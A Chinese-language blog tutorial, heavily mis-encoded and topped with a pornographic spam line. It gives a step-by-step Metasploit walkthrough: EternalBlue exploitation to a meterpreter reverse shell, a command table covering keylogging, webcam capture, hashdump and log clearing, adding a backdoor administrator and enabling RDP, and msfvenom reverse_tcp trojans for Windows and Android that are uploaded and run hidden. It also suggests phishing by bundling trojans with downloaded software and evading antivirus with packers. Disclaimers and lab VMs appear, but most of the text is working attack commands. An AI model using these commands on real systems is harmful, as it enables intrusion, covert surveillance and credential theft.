国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)?/h1>

這篇具有很好參考價(jià)值的文章主要介紹了進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)?。希望?duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

數(shù)據(jù)來(lái)源

??本文僅用于信息安全學(xué)習(xí),請(qǐng)遵守相關(guān)法律法規(guī),嚴(yán)禁用于非法途徑。若觀眾因此作出任何危害網(wǎng)絡(luò)安全的行為,后果自負(fù),與本人無(wú)關(guān)。?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

得到ip地址我們能干嘛?

????????首先進(jìn)行端口掃描

為什么要進(jìn)行端口掃描?

????????端口掃描的作用就是發(fā)現(xiàn)目標(biāo)主機(jī)開(kāi)放的端口及其對(duì)應(yīng)開(kāi)放的服務(wù),攻擊者通過(guò)發(fā)現(xiàn)及利用服務(wù)所存在的漏洞,入侵目標(biāo)主機(jī)。

-?Nmap?-掃描器之王

metasploit是什么?

????????msf是一款開(kāi)源安全漏洞利用和測(cè)試工具,集成了各種平臺(tái)上常見(jiàn)的溢岀漏洞和流行的 shellcode,并持續(xù)保持更新。

????????netasploiti讓復(fù)雜的漏洞攻擊流程變的非常簡(jiǎn)單,一個(gè)電腦小白經(jīng)過(guò)幾小時(shí)的學(xué)習(xí),就能對(duì)操作系統(tǒng)等主流漏洞發(fā)起危害性攻擊。?

啟動(dòng) metasploit 前需要做:

  • 打開(kāi)ka終端
  • 使用 sudo su命令,并輸入kali的密碼kali,切換至root用戶
  • 使用 msfdb init命令初始化 metasploit數(shù)據(jù)庫(kù)(*可選)?

metasploit攻擊 windows操作系統(tǒng)

????????msfconsole? ? ? ? ? ?#?啟動(dòng) metasploita命令行【命令行效率高,使用方便】

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

msf使用法則:

????????使用模塊? ->? 配置模塊必選項(xiàng)? ->? 運(yùn)行模塊。??????? 三步操作,就能實(shí)現(xiàn)對(duì)主流漏洞的攻擊?

永恒之藍(lán)漏洞:

????????永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體 ShadowBrokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用 Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過(guò)改造“永恒之藍(lán)”制作了 Wannacry勒索病毒,英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件。

metasploit攻擊永恒之藍(lán)全流程:

1. 使用模塊

????????use exploit/windows/smb/ms17_010_eternalblue

2. 設(shè)置必選項(xiàng)

????????查看必選項(xiàng)【*required 為yes的就是必選項(xiàng)】?

????????show options

或者

1. 搜索漏洞編號(hào):

????????search ms17_010? ? ? ?# 搜索2017年的10號(hào)漏洞永恒之藍(lán)(微軟定義),search 使用

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

2.?使用模塊

?????????可以通過(guò)模塊名稱或模塊編號(hào)使用模塊

????????use exploit/windows/smb/ms17_010_eternalblue? # 通過(guò)模塊名稱使用模塊

????????或(選擇一種方式即可)

????????use 0? ??????????????????????????????????????????????????????????????????????????# 通過(guò)模塊編號(hào)使用模塊

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

3. 查看模塊所需要的配置內(nèi)容

????????show options? ? ? ? ? ? ? # 可以按tab鍵自動(dòng)補(bǔ)全命令,show?顯示/展示? ?options? 選項(xiàng)

????????必選項(xiàng)是:yes 的就是必選設(shè)置,一些是有默認(rèn)的,一些是沒(méi)有默認(rèn)的就需要我們添加,如目標(biāo)主機(jī)狀態(tài)是yes,但是當(dāng)前設(shè)置時(shí)空。

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

實(shí)驗(yàn):

????????1、準(zhǔn)備一臺(tái)靶機(jī)(我這里開(kāi)了一臺(tái)winXP),并查看靶機(jī)的IP地址(等下用做攻擊目標(biāo))

????????ipconfig????????? # 查看本機(jī)IP地址

? ? ? ??ifconfig eth0? # kali查看IP?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?2、回到kli設(shè)置metasploit的必選項(xiàng),攻擊目標(biāo)這些

?????????set RHOSTS 192.168.0.103? ?# 設(shè)置目標(biāo)IP地址,set? (設(shè)置)RHOSTS 目標(biāo)主機(jī)的名稱,代表你要攻擊誰(shuí),目標(biāo)主機(jī)地址也可以寫一個(gè)范圍如:192.168.0.103-254

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

????????show options? ? ? ? ? ? ? # show?顯示/展示? ?options? 選項(xiàng),查看還有什么需要設(shè)置的

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=????????set payload windows/x64/meterpreter/reverse_tcp? #?payload 是攻擊載荷,就是攻擊完成后想干啥,這里是想獲取 meterpreter (默認(rèn)就是這個(gè))meterpreter是 metasploit 后滲透的神器?

????????set LHOST 192.168.0.102????????? #?LHOSTS為 listen host (偵聽(tīng)主機(jī))代表你是誰(shuí),既kali的IP地址默認(rèn)就是kali自己的IP地址,如果你的不是那就可以修改

????????set lport 10001? ?# 將端口設(shè)置為10001,代表你要在kali上開(kāi)啟的端口,1-65535隨便選,但不能被占用,默認(rèn)的端口是:4444,為了攻擊的成功率可以改一下

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

????????show options? ? ? ? ? ? ? # 查看配置

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?3、啟動(dòng)運(yùn)行模塊,開(kāi)啟攻擊

????????命令:run

????????我這里攻擊失敗了,原因:192.168.0.103:445-由于失敗而中止利用漏洞:無(wú)目標(biāo):此模塊僅支持x64(64位)目標(biāo)?????????

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

開(kāi)一臺(tái)64位操作系統(tǒng)的虛擬機(jī),繼續(xù)實(shí)驗(yàn)

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

繼續(xù)查看主機(jī)IP

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

重新設(shè)置攻擊目標(biāo)

?????set RHOSTS?192.168.0.106???# 設(shè)置目標(biāo)IP地址

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?啟動(dòng)運(yùn)行模塊,開(kāi)啟攻擊

????????命令:run

?????攻擊成功命令行就會(huì)來(lái)到meterpreter>,這里就是拿到了目標(biāo)主機(jī)的權(quán)限?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?攻擊成功,拿到了對(duì)方的權(quán)限可以干嘛?可以輸入:help? ?# 查看幫助

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?核心命令

命令? ?

說(shuō)明

? “幫助”菜單
?background? 當(dāng)前會(huì)話的背景
bg 背景別名
bgkill 殺死背景meterpreter腳本
bglist 列出正在運(yùn)行的后臺(tái)腳本
bgrun 作為后臺(tái)線程執(zhí)行meterpreter腳本
channel 顯示信息或控制活動(dòng)通道
close 關(guān)閉頻道
detach 分離meterpreter會(huì)話(對(duì)于http/https)
disable_unicode_encoding 禁用unicode字符串的編碼
enable_unicode_encoding 啟用unicode字符串的編碼
exit ? ? ? ? ? ? ? ? ? ? ? 終止meterpreter會(huì)話
get_timeouts 獲取當(dāng)前會(huì)話超時(shí)值
guid 獲取會(huì)話guid
help ? ? ? ? ? ? ? ? ? ? ? 幫助菜單
info 顯示有關(guān)Post模塊的信息
irb 在當(dāng)前會(huì)話上打開(kāi)交互式Ruby shell
load ? ? ? ? ? ? ? ? ? ? ? 加載一個(gè)或多個(gè)meterpreter擴(kuò)展
machine_id 獲取連接到會(huì)話的計(jì)算機(jī)的MSF id
migrate ? ? ? ? ? ? ? ? ?? 將服務(wù)器遷移到另一個(gè)進(jìn)程
pivot 管理數(shù)據(jù)透視偵聽(tīng)器
pry ? ? ? ? ? ? ? ? ? ? ?? 在當(dāng)前會(huì)話上打開(kāi)Pry調(diào)試器
quit ? ? ? ? ? ? ? ? ? ? ? 終止meterpreter會(huì)話
read 從通道讀取數(shù)據(jù)
resource 運(yùn)行存儲(chǔ)在文件中的命令
run 執(zhí)行meterpreter腳本或Post模塊
secure ? ? ? ? ? ? ? ? ? ? (重新)協(xié)商TLV數(shù)據(jù)包加密
sessions ? ? ? ? ? ? ? ? ? 快速切換到另一個(gè)會(huì)話
set_timeouts 設(shè)置當(dāng)前會(huì)話超時(shí)值
sleep 強(qiáng)制儀表安靜,然后重新建立會(huì)話,用法:用法:sleep<秒數(shù)>
ssl_verify 修改ssl證書驗(yàn)證設(shè)置
transport ? ? ? ? ? ? ? ?? 管理運(yùn)輸機(jī)制
use “l(fā)oad”的別名已棄用
uuid 獲取當(dāng)前會(huì)話的uuid
write 將數(shù)據(jù)寫入通道

Stdapi:文件系統(tǒng)命令

命令 說(shuō)明
cat 將文件的內(nèi)容讀到屏幕上
cd 更改目錄
checksum 檢索文件的校驗(yàn)和
cp 將源復(fù)制到目標(biāo)
del 刪除指定的文件
dir 列表文件(ls的別名)
download 下載文件或目錄
edit ? ? ? ? ? 編輯文件
getlwd 打印本地工作目錄
getwd 打印工作目錄
lcat 將本地文件的內(nèi)容讀取到屏幕

lcd

更改本地工作目錄
lls 列出本地文件
lpwd 打印本地工作目錄
ls 列表文件
mkdir 創(chuàng)建新目錄
mv 將源文件移動(dòng)到目標(biāo)
pwd 打印工作目錄
rm 刪除指定的文件
rmdir 刪除目錄
search ? ? ? ? 搜索文件
show_mount 列出所有裝載點(diǎn)/邏輯驅(qū)動(dòng)器
upload 上載文件或目目錄(可以用來(lái)上傳文件到對(duì)方電腦)

Stdapi:網(wǎng)絡(luò)命令

命令 說(shuō)明
arp 顯示主機(jī)arp緩存
getproxy 顯示當(dāng)前代理配置
ifconfig 顯示界面
ipconfig 顯示IP界面
netstat 顯示網(wǎng)絡(luò)連接與對(duì)方開(kāi)放的端口
portfwd 將本地端口轉(zhuǎn)發(fā)到遠(yuǎn)程服務(wù)
resolve ? ? ?? 解析目標(biāo)上的一組主機(jī)名
route 查看和修改路由表

Stdapi:系統(tǒng)命令

命令 說(shuō)明
clearev 清除事件日志
drop_token 放棄任何活動(dòng)模擬令牌。
execute ? ? ?? 執(zhí)行命令
getenv 獲取一個(gè)或多個(gè)環(huán)境變量值
getpid 獲取當(dāng)前進(jìn)程標(biāo)識(shí)符
getprivs 嘗試啟用當(dāng)前進(jìn)程可用的所有權(quán)限
getsid 獲取服務(wù)器正在運(yùn)行的用戶的SID
getuid 獲取服務(wù)器運(yùn)行的用戶
kill 終止進(jìn)程
localtime 顯示目標(biāo)系統(tǒng)的本地日期和時(shí)間
pgrep 按名稱篩選進(jìn)程
pkill 按名稱終止進(jìn)程
ps 列出正在運(yùn)行的進(jìn)程
reboot 重新啟動(dòng)遠(yuǎn)程計(jì)算機(jī)
reg 修改并與遠(yuǎn)程注冊(cè)表交互
rev2self 在遠(yuǎn)程計(jì)算機(jī)上調(diào)用RevertToSelf()
shell 放入系統(tǒng)命令shell
shutdown 關(guān)閉遠(yuǎn)程計(jì)算機(jī)
stealt_token 嘗試從目標(biāo)進(jìn)程中竊取模擬令牌
suspend 暫?;蚧謴?fù)進(jìn)程列表
sysinfo 獲取有關(guān)遠(yuǎn)程系統(tǒng)的信息,如操作系統(tǒng)

Stdapi:用戶界面命令

命令 說(shuō)明
enumdesktops 列出所有可訪問(wèn)的桌面和窗口工作站
getdesktop 獲取當(dāng)前meterpreter桌面
idletime 返回遠(yuǎn)程用戶空閑的秒數(shù)
keyboard_send 發(fā)送鍵擊
keyevent 發(fā)送按鍵事件
keyscan_dump 轉(zhuǎn)儲(chǔ)擊鍵緩沖區(qū)
keyscan_start 開(kāi)始捕獲擊鍵
keyscan_stop 停止捕獲擊鍵
mouse 發(fā)送鼠標(biāo)事件
screenshare ? ? 共享實(shí)時(shí)監(jiān)視遠(yuǎn)程用戶桌面
screenshot ? ?? 截圖,獲取交互式桌面的截圖
setdesktop 更改meterpreters當(dāng)前桌面
uictl 控制一些用戶界面組件

Stdapi:正在使用網(wǎng)絡(luò)攝像頭命令

命令 說(shuō)明
record_mic 從默認(rèn)麥克風(fēng)錄制音頻X秒
webcam_chat 開(kāi)始視頻聊天
webcam_list 列出網(wǎng)絡(luò)攝像頭
webcam_snap 從指定的網(wǎng)絡(luò)攝像機(jī)拍攝快照
webcam_stream 從指定的網(wǎng)絡(luò)攝像機(jī)播放視頻流(打開(kāi)攝像頭)

Stdapi:音頻輸出命令

命令 說(shuō)明
play? 在目標(biāo)系統(tǒng)上播放波形音頻文件(.wav)

Priv:提升命令

命令 說(shuō)明
getsystem 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限

密碼數(shù)據(jù)庫(kù)命令

命令 說(shuō)明
hashdump 轉(zhuǎn)儲(chǔ)SAM數(shù)據(jù)庫(kù)的內(nèi)容

Priv:時(shí)間戳命令

命令 說(shuō)明
timestomp 操縱文件MACE屬性

攻擊成功后的命令使用:

????????攻擊成功后成功獲取到對(duì)方主機(jī)的權(quán)限,上面的這操作命令直接輸入到命令行使用就行了

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?注意:上面表格中的命令我也沒(méi)有仔細(xì)檢查過(guò),如果使用時(shí)出現(xiàn)報(bào)錯(cuò)那應(yīng)該是我填錯(cuò)了,這時(shí)可以輸入命令:

????????help? ?# 查看幫助,按類型獲取到正確的命令,也可以在下方給我留言我會(huì)及時(shí)更改。

攻擊成功后的使用示例:?

????????攻擊成功后能做什么meterpreter是強(qiáng)大的后滲透模塊,可以輸入help查看幫助信息

????????遠(yuǎn)程控制、命令執(zhí)行、攝像頭監(jiān)控、密碼獲取、創(chuàng)建后門用戶、破壞篡改系統(tǒng)...這些看起來(lái)非常復(fù)雜又高級(jí)的操作都能用 meterpreter中一行或幾個(gè)字母,簡(jiǎn)單的命令完成

例:創(chuàng)建后門用戶并開(kāi)啟遠(yuǎn)程連接(3389)?

????????shell? ? ??????????????????????????????????????????????????????#?啟動(dòng)dos窗口,這樣就能使用DOS 命令

????????chcp 65001? ????????????????????????????????????????????# 默認(rèn)情況下編碼為936,中文會(huì)出現(xiàn)亂碼問(wèn)題,65001為UTF-8的代碼頁(yè),可以正常顯示中文

????????net user zhangsan 123456 /add & net localgroup administrators zhangsan /add?

????????或分開(kāi)執(zhí)行

????????net user zhangsan 123456 /add?? ? ? ? ? ? ?# 創(chuàng)建一個(gè)用戶名為“zhangsan ”密碼是“123456 ”

????????net localgroup administrators zhangsan /add?? ?# 將zhangsan 加入到管理員組(提升權(quán)限)

????????exit????????????????? ? ? ? ? ? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?# 退到上一級(jí)目錄(這里是退出dos窗口回到,meterpreter >?)

????????getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??? ? ??#??先將當(dāng)前的session提升為system權(quán)限(以防萬(wàn)一)

????????run post/windows/manage/enable_rdp? ?#??利用此后滲透模塊即可直接開(kāi)啟遠(yuǎn)程桌面,開(kāi)啟受害者主機(jī)3389端口(遠(yuǎn)程桌面連接端口)

????????這樣一套命令下來(lái),以后我們就可以直接使用?zhangsan 這個(gè)賬號(hào)登錄3389端口的遠(yuǎn)程桌面服務(wù),遠(yuǎn)程控制目標(biāo)主機(jī)(mstsc -v 目標(biāo)ip)

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

rdesktop 192.168.0.103:3389? # 連接受害者主機(jī)的遠(yuǎn)程桌面,如下圖所示:

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

需要注意的是你登錄了,對(duì)方會(huì)被你擠下線?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

1)使用Kali滲透工具生成遠(yuǎn)控木馬

????????想遠(yuǎn)程控制別人?msfvenom 生成遠(yuǎn)控木馬了解一下

????????msfvenom 是用來(lái)生成后門的軟件,在目標(biāo)機(jī)上執(zhí)行后門,在本地監(jiān)聽(tīng)上線。

? ? ? 【* msfvenom在shell里使用,不是 msfconsole 終端】

????????payload????????攻擊載荷?

????????windows?? ? ??是指微軟的windows操作系統(tǒng),如果目標(biāo)是其他系統(tǒng)這里就改成其他系統(tǒng)名稱如:Linux

? ? ? ? lhost?? ? ? ? ? ? ??代表你是誰(shuí),既kali的IP地址

????????lport? ? ? ? ? ? ??代表你要在kali上開(kāi)啟的端口,1-65535隨便選,但不能被占用

????????-f? ? ? ? ? ? ? ? ? ??是指format(格式)

????????exe ???????????????是windows格式文件,是指生成木馬文件的文件格式,exe 和 dll(Windows 系列)、elf(Linux 系列)和 Mach-O(Mac系列)

? ? ? ? -o? ? ? ? ? ? ? ? ? 是指output(輸出),后面跟的demo.exe是文件名,自定義隨便改。

????????msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102?lport=9988?-f exe -o demo.exe?

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=9988 R > /home/kali/Desktop/lanxf.apk
?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?生成木馬文件示例:

????????輸入:exit? ? # 退回上一級(jí),直到回到kali的命令行中

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?????????msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo999.exe? ?# 生成木馬文件

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

????????現(xiàn)在文件就生成到桌面的我們可以在桌面查看文件?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?????????這個(gè)文件可以通過(guò)郵箱或其他社交平臺(tái)發(fā)送給對(duì)方,然后對(duì)方運(yùn)行了之后我們就可以對(duì)他電腦進(jìn)行遠(yuǎn)程控制(不過(guò)一般情況下會(huì)被對(duì)方的殺毒軟件直接殺死)如下面這樣,我們直接把木馬文件復(fù)制到自己的真實(shí)機(jī),殺毒軟件會(huì)自動(dòng)檢測(cè)并殺死。

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

????????注意:這里是在命令行的桌面路徑下輸入命令所以文件默認(rèn)是生成在桌面,如果想改生成文件的位置,那就把命令后面的文件名改成路徑加文件名,如:/home/kali/demo999.exe? ??;蛘呤褂妹睿篶d 路徑? ?# 更改命令行的路徑

生成木馬就完事?把木馬文件發(fā)送到目標(biāo)主機(jī)

(注意這一步需要使用上面寫的方法通過(guò)metasploit獲取到目標(biāo)的權(quán)限才行,如果對(duì)方電腦沒(méi)有漏洞獲取不到對(duì)方權(quán)限,那就需要用釣魚的方式讓受害者自己下載,比如我們?cè)诎俣壬舷螺d的軟件都有很多捆綁軟件)

????????pwd?????????????????????????????????????????????????????????????????# 打印目標(biāo)的工作目錄

????????upload /home/kali/桌面/demo999.exe? ????????# 把木馬文件發(fā)送到目標(biāo)的電腦上

???????upload /home/kali/桌面/demo999.exe d:\\? ? # 也可以指定文件路徑,發(fā)送到對(duì)方的D盤根目錄下

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

記得在 msfconsole里開(kāi)啟監(jiān)聽(tīng),等待受害者運(yùn)行上鉤?

????????現(xiàn)在有了木馬文件,我們要讓別人下載,俗稱:“釣魚”?

首先:制作魚鉤

????????msfconsole?????????????????????????# 啟動(dòng) metasploita命令行

????????use exploit/multi/handler? ?# 使用模塊

????????show options? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置,查看這個(gè)模塊需要配置那些選項(xiàng)才能使用

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

1)設(shè)置攻擊載荷:

?????????set payload windows/x64/meterpreter/reverse_tcp? ?# 這個(gè)攻擊載荷就是上面我們使用的攻擊載荷

????????show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

2)設(shè)置偵聽(tīng)地址

????????set LHOST 192.168.0.102????????? #?LHOSTS為 listen host (偵聽(tīng)主機(jī))代表你是誰(shuí),既kali的IP地址

????????show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # 查看設(shè)置

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

3)設(shè)置幀聽(tīng)端口:

????????set lport?9988? ?# 就是要在kali上要開(kāi)啟的端口,注意這里的端口要和前面生成木馬文件的端口一樣,我上面是用9988端口這里也要9988端口,默認(rèn)的端口是4444

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

4)運(yùn)行模塊:run? ?# 簡(jiǎn)單理解就是把魚鉤放到河里

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

現(xiàn)在我們要做的就是等待魚兒上鉤:

  • 方法一:我們主動(dòng)將鉤子摁到魚兒上(利用漏洞)
  • 方法二:姜太公釣魚,愿者上鉤!

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

假設(shè)目標(biāo)通過(guò)網(wǎng)上下載了其他軟件比如啥直播、游戲之類的,然后我的木馬文件也和這些軟件綁定了,他也運(yùn)行了,之后我們就可以對(duì)他進(jìn)行些操作。

通過(guò)命令運(yùn)行對(duì)方的木馬文件(需要使用上面寫的方法通過(guò)metasploit獲取到目標(biāo)的權(quán)限)

????????execute -H -i -f demo999.exe? ? ? ? ? # 運(yùn)行demo999.exe這個(gè)剛才我們發(fā)到目標(biāo)過(guò)去的木馬文件,?-H 不可見(jiàn),-i 交互

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?然后輸入:???help? ?# 查看通過(guò)這個(gè)木馬文件我們能干啥,可以使用的功能和我上面列出來(lái)的命令一樣

webcam_list 列出網(wǎng)絡(luò)攝像頭(查看對(duì)方的電腦有沒(méi)有攝像頭)
webcam_stream 從指定的網(wǎng)絡(luò)攝像機(jī)播放視頻流(打開(kāi)攝像頭)

我這里的目標(biāo)是虛擬機(jī)所以這塊,響應(yīng)的信息是沒(méi)有?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?ctrl + c 退出監(jiān)控

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

殺毒軟件會(huì)查殺怎么辦?一招教你躲避火絨的探測(cè)

????????最基礎(chǔ)的免殺【*對(duì)于其他殺毒軟件效果不同,具體情況請(qǐng)自行嘗試】

捆綁木馬(現(xiàn)在基本沒(méi)效果,殺毒軟件的技術(shù)更新了)

????????msfvenom -p windows/64/meterpreter/reverse tcp lhost=192.168.0.102?lport=9999 -f? exe-xnotepad++. exe -o notepad++.exe? ??

?加殼:壓縮殼、加密殼

如:Themida

使用示例:

????????打開(kāi)軟件?

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

然后耐心等待加密過(guò)程,最后加密成功的界面如下,之后就可以關(guān)閉軟件了。

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

然后可以復(fù)制到真實(shí)機(jī)上測(cè)試

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)? referrerpolicy=

?????????后門木馬請(qǐng)勿隨意傳播,如果造成危害屬于提供計(jì)算機(jī)操作系統(tǒng)入侵工具罪及非法入侵計(jì)算機(jī)操作系統(tǒng)數(shù)罪并罰。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-457085.html

到了這里,關(guān)于進(jìn)入黑客的世界:Kali Linux 中的 Metasploit 滲透測(cè)試?yán)鞯奈恼戮徒榻B完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Kali最強(qiáng)滲透工具-metasploit

    Kali最強(qiáng)滲透工具-metasploit

    msf是一款開(kāi)源安全漏洞利用和測(cè)試工具,集成了各種平臺(tái)上常見(jiàn)的溢出漏洞和流行的shellcode,并持續(xù)保持更新。 metasploit讓復(fù)雜的漏洞攻擊流程變的非常簡(jiǎn)單,一個(gè)電腦小白經(jīng)過(guò)幾小時(shí)的學(xué)習(xí),就能對(duì)操作系統(tǒng)等主流漏洞發(fā)起危害性攻擊 metasploit 攻擊 windows 操作系統(tǒng) msfconsol

    2024年02月15日
    瀏覽(29)
  • 【kali-漏洞利用】(3.4)Metasploit滲透攻擊應(yīng)用:MySQL滲透過(guò)程

    目錄 一、滲透攻擊MySQL 1.1、第一步:信息收集 db_nmap掃描(內(nèi)置、外置都可) Metasploit模塊 sqlmap 1.2、第二步:獲取服務(wù)器權(quán)限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源碼中尋找數(shù)據(jù)庫(kù)密碼 向服務(wù)器寫WebShell 1.3、第三步:提權(quán) UDF提權(quán)(UDF提權(quán)) Mof提權(quán) MySQL啟動(dòng)項(xiàng)提權(quán) 1

    2024年02月08日
    瀏覽(24)
  • 【Kali Linux高級(jí)滲透測(cè)試】深入剖析Kali Linux:高級(jí)滲透測(cè)試技術(shù)與實(shí)踐

    【Kali Linux高級(jí)滲透測(cè)試】深入剖析Kali Linux:高級(jí)滲透測(cè)試技術(shù)與實(shí)踐

    ??作者簡(jiǎn)介: 熱愛(ài)跑步的恒川 ,致力于C/C++、Java、Python等多編程語(yǔ)言,熱愛(ài)跑步,喜愛(ài)音樂(lè)的一位博主。 ??本文收錄于恒川的日常匯報(bào)系列,大家有興趣的可以看一看 ??相關(guān)專欄C語(yǔ)言初階、C語(yǔ)言進(jìn)階系列、恒川等,大家有興趣的可以看一看 ??Python零基礎(chǔ)入門系列,J

    2024年02月10日
    瀏覽(21)
  • 肥腸恐布--探索Kali Linux中的Metasploit Framework(MSF聽(tīng)說(shuō)腎透大佬經(jīng)常用)

